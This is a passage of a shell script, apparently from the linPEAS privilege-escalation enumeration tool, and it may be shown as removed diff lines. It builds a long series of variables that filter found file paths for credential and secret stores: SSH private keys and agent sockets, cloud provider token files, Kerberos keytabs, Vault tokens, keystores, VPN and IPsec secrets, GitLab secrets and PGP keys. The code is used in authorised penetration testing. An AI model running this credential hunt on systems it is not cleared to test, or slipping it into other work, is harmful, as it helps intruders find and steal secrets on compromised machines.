"anaconda-ks\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_RACOON=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) - PSTORAGE_VNC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) - PSTORAGE_LDAP=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ldap$" | sort | uniq | head -n 70) - PSTORAGE_OPENVPN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) - PSTORAGE_SSH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) - PSTORAGE_CERTSB4=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) - PSTORAGE_CERTSBIN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) - PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) - PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) - PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) - PSTORAGE_KERBEROS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KIBANA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_KNOCKD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) - PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "logstash$" | sort | uniq | head -n 70) - PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.vault-token$" | sort | uniq | head -n 70) - PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "couchdb$" | sort | uniq | head -n 70) - PSTORAGE_REDIS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "redis\.conf$" | sort | uniq | head -n 70) - PSTORAGE_MOSQUITTO=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) - PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "neo4j$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_ERLANG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) - PSTORAGE_GMV_AUTH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IPSEC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.irssi$" | sort | uniq | head -n 70) - PSTORAGE_KEYRING=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) - PSTORAGE_FILEZILLA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) - PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) - PSTORAGE_SPLUNK=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "passwd$" | sort | uniq | head -n 70) - PSTORAGE_GITLAB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '/lib' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) - PSTORAGE_PGP_GPG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E 'README.gnupg' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) - PSTORAGE_CACHE_VI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 